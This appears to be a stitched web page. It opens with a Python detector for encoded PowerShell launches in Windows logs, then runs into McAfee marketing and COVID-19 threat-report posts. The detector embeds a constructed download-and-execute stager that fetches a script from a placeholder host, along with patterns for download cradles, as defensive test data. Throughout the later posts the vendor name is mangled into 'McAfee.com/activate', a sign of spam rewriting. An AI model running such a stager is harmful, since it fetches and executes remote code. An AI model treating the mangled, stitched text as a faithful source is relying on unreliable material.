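The PowerShell deployment step is where a SOC can get early detection, because ransomware loaders are commonly launched as powershell.exe -EncodedCommand with the script base64-encoded as UTF-16LE text, which hides it from plain keyword searches. The following Python is an added example, not from the original post and not McAfee’s detection logic: it finds the encoded-command flag (powershell.exe accepts any unambiguous prefix down to -e, plus -ec), decodes the script, and scores the command line and decoded text against a few well-known signals. The log lines are constructed to imitate the CommandLine field of Windows Security event 4688 (which only carries the command line when “Include command line in process creation events” is enabled) or Sysmon event 1; example.invalid is a reserved hostname, and the score threshold is this example’s choice.

```python
"""Find and decode PowerShell -EncodedCommand launches in process-creation logs.

Added example, not from the original post. The stager text and the log
lines are constructed; the signal list and threshold are this example's own.
"""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, down to -e, plus -ec.
_PREFIXES = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}, key=len, reverse=True)
ENCODED_RE = re.compile(r"(?i)(?<![\w-])-(?:" + "|".join(_PREFIXES) + r")\s+([A-Za-z0-9+/=]{16,})")

# Signals checked against the raw command line plus the decoded script.
SIGNALS = {
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "no_profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "bypass_policy": re.compile(r"(?i)-e\w*\s+bypass"),
    "download_cradle": re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient)"),
    "invoke_expression": re.compile(r"(?i)(invoke-expression|\biex\b)"),
}


def decode_encoded_command(b64: str):
    """Return the script text, or None if the blob is not valid base64 / UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmd: str) -> dict:
    """Decode any encoded command and list the suspicious signals found."""
    m = ENCODED_RE.search(cmd)
    decoded = decode_encoded_command(m.group(1)) if m else None
    haystack = cmd + ("\n" + decoded if decoded else "")
    signals = [name for name, rx in SIGNALS.items() if rx.search(haystack)]
    if m:
        signals.insert(0, "encoded_command")
    return {"command": cmd, "decoded": decoded, "signals": signals, "score": len(signals)}


def encode_powershell(script: str) -> str:
    """Produce the -EncodedCommand form of a script, exactly as PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def scan_events(lines, min_score: int = 2) -> list:
    """Pull CommandLine= out of each event and keep those at or above the threshold."""
    hits = []
    for line in lines:
        cmd = line.partition("CommandLine=")[2]
        if not cmd:
            continue
        result = analyze_command_line(cmd)
        if result["score"] >= min_score:
            hits.append(result)
    return hits


# Constructed stager and log lines (example.invalid never resolves).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
SAMPLE_EVENTS = [
    "EventID=4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -nop -w hidden -enc " + encode_powershell(STAGER),
    "EventID=4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\nightly-backup.ps1",
    "EventID=4688 NewProcessName=C:\\Windows\\System32\\cmd.exe CommandLine=cmd.exe /c whoami",
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f"score {hit['score']}: {hit['signals']}")
        print("  decoded:", hit["decoded"])
```

The scheduled backup that runs with -ExecutionPolicy Bypass scores 1 and is left alone; the hidden, profile-less launch whose decoded payload is a download cradle scores 5. Tune min_score to your environment, and log the decoded text with the alert so the responder does not have to decode it again.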

Human-Machine Teaming

With more automation and new high-fidelity data, the SOC can focus on the complex issues that require human intuition and insight, increasing a security team’s strategic abilities. With McAfee MVISION Insights, we’re turning that concept into a reality.

McAfee MVISION Insights, a key and unique component of the MVISION Endpoint Security platform, enables security analysts to significantly increase the proactive security posture of the organization’s countermeasures while reducing the time the SOC must spend to accomplish this.

We architected MVISION Insights from the ground up to operate on a Human-Machine AI teaming model. Effective analytic models prioritize potential threats by applying algorithms that alert teams to the high-impact campaigns they need to be aware of and provide prescriptive guidance on how to defend the organization.

This is a tremendous benefit to threat hunters who operate in environments where speed and precision in identifying the things that really matter make all the difference.

MVISION Insights does this by analyzing threat telemetry from over a billion sensors worldwide, including those within an organization, together with the threat research developed by McAfee’s Advanced Threat Research team. Additionally, metadata describing an enterprise’s security posture enables Insights to deliver a custom recommendation on which products and configurations are needed to defend against specific, high-impact, in-the-wild threats.

In addition to these core capabilities, McAfee will be able to build new modules on top of the Insights foundation. This is possible because we developed Insights as a platform that allows easy integration of new capabilities: as we identify the next generation of AI and data science techniques, we can deploy those features without requiring a customer to deploy new products.

Gain hands-on experience with this proactive endpoint security capability that delivers actionable intelligence before an attack occurs. Check out the MVISION Insights Preview on McAfee.com to see the top ten threat campaigns.

Monday, September 7, 2020

McAfee.com/activate COVID-19 Report Reveals Pandemic Threat Evolution

The McAfee.com/activate Advanced Threat Research team today published the McAfee.com/activate Labs COVID-19 Threats Report, July 2020.

In this “Special Edition” threat report, we delve deep into the COVID-19 related attacks observed by our McAfee.com/activate Advanced Threats Research and McAfee.com/activate Labs teams in the first quarter of 2020 and the early months of the pandemic.

What started as a trickle of phishing campaigns and the occasional malicious app quickly turned to thousands of malicious URLs and more-than-capable threat actors leveraging our thirst for more information as an entry mechanism into systems across the world.

Thus far, the dominant themes of the 2020 threat landscape have been cybercriminals’ quick adaptation to exploit the pandemic and the considerable impact cyberattacks have had. For example, many ransomware attacks have escalated into data breaches as cybercriminals up the ante by leaking sensitive, often regulated, data, regardless of whether victims have paid the ransom.

Some of the other significant threat findings in our COVID-19 report include:

  • Average of 375 threats per minute in Q1 2020
  • Nearly 47% of all publicly disclosed security incidents took place in the United States
  • New PowerShell malware increased drastically
  • Disclosed incidents largely targeted Public, Individual, and Education sectors

In a first, we also have made available a COVID-19 dashboard to complement this threat report and extend its impact beyond the publication date. Timeliness is a challenge for publishing any threat report, but through the development of MVISION Insights, our threat reports will include a link to another live dashboard tracking the world’s top threats. We will also make available the IOCs, YARA rules, and mapping to the MITRE ATT&CK framework as part of our continuing commitment to sharing our actionable intelligence. I hope these McAfee.com/activate resources will be useful to you, the reader.

As we head into the second half of the year, we must consider how the threat landscape has changed when we address and define each attack. Simply assigning a technical descriptor or reverting to the same attack classifications fails to communicate the impact such campaigns have on the broader society.

All too often, we are called into investigations where businesses have been halted, or victims have lost considerable sums of money. While we all have had to contend with pandemic lockdown, criminals of all manner of capability have had a field day.

We hope you enjoy these new threat report approaches, and moreover, we would appreciate you sharing these findings far and wide. These tools and insights could be the difference between a business remaining operational or having to shut its doors at a time when we have enough challenges to contend with.

Staying Home? McAfee.com/activate Report Shows Malware May Come Knocking

It’s no secret that COVID-19 continues to reshape the way we live our everyday lives. With each passing day, we become more reliant on our devices to stay connected with friends and family, move our professional work forward, participate in distance learning, or keep ourselves entertained.

Unfortunately, hackers are all too aware of these habits. In fact, findings from “McAfee.com/activate’s COVID-19 Threat Report: July 2020” have shown how criminals pair threats to whatever is present in consumers’ lives – specifically targeting pandemic-related industries, device habits, behaviors, and more with new malware strains.

A Day in the Life of Today’s Consumer

The day in the life of today’s consumer involves a lot of internet time.

Back in March, users first transitioned from in-office to work from home to promote social distancing. As a result, they conduct their 9-to-5 from their personal living space. But with such a rushed transition, some of these workers aren’t trained on how the change impacts their online security and could potentially be working on unsecured Wi-Fi.

Working professionals aren’t the only ones who have had to adapt to a new remote environment. Students have also made the transition to distance learning, moving from in-person course work to virtual classrooms. But as more students continue their curriculum from home and online activity increases, they become more reliant on digital platforms, such as video conferencing, that have now caught the eye of hackers.

When these professionals or students are done for the day, they then turn to some safe ways to unwind. To keep entertained, users have turned to online gaming, shopping, podcasts, social media, and TV streaming for fun – with the latter experiencing a 12% increase in viewing time in the third week of March alone.

More Online Activity, More Opportunities for Cyberattacks

As it turns out, this increase in online activity has given hackers plenty of new avenues to exploit, almost all of which are pandemic-related. First and foremost, hackers have targeted attacks at those that feel the impacts of COVID-19 most directly, that is, the public sector. As McAfee.com/activate’s research discovered, incidents have increased during Q1 2020 within the public sector by 73%, individuals by 59%, education by 33%, and manufacturing by 44%.

Additionally, McAfee.com/activate Labs saw an average of 375 new threats per minute and a surge of cybercriminal exploits through COVID-19 themed malicious apps, phishing campaigns, malware, and more during the first quarter of this year. Specifically, McAfee.com/activate researchers discovered campaigns using pandemic-related subject lines – including testing, treatments, cures, and remote work topics. Criminals are using this sneaky tactic to lure targets into clicking on a malicious link, downloading a file, or viewing a PDF, resulting in the user’s device becoming infected with malware.

The Rise of Malware

Speaking of malware – according to the latest McAfee.com/activate COVID-19 Threat Report, total malware increased by 27% over the past four quarters and new Mac OS malware samples increased by 51%. New mobile malware also increased by a whopping 71%, with total mobile malware increasing almost 12% over the past four quarters. As for IoT devices, new malware samples increased by nearly 58%, with total IoT malware growing 82% over the past few quarters.

Mask Your Digital Life

During this time of uncertainty, it can be difficult to distinguish fact from fiction, to successfully identify a malicious scheme and stop it in its tracks. However, consumers can help protect their digital lives by following security best practices, now and in the future. Here’s what you can do to safeguard your security and remain worry-free:

Stay updated on the latest threats

To track malicious pandemic-related campaigns, McAfee.com/activate Advanced Programs Group (APG) has published a COVID-19 Threat Dashboard, which includes the top threats leveraging the pandemic, the most targeted verticals and countries, and the most utilized threat types and their volume over time. The dashboard is updated daily at 4pm ET.

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the pandemic, it’s best to proceed with caution and avoid interacting with the message altogether.

Use a VPN

Avoid hackers infiltrating your network by using a VPN, which allows you to send and receive data while encrypting – or scrambling – your information so others can’t read it. By helping to protect your network, VPNs also prevent hackers from accessing other devices (work or personal) connected to your Wi-Fi.

Use a comprehensive security solution

Use robust security software like McAfee.com/activate Total Protection, which helps to defend your entire family from the latest threats and malware while providing safe web browsing.

Stay updated

To stay updated on all things McAfee.com/activate and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.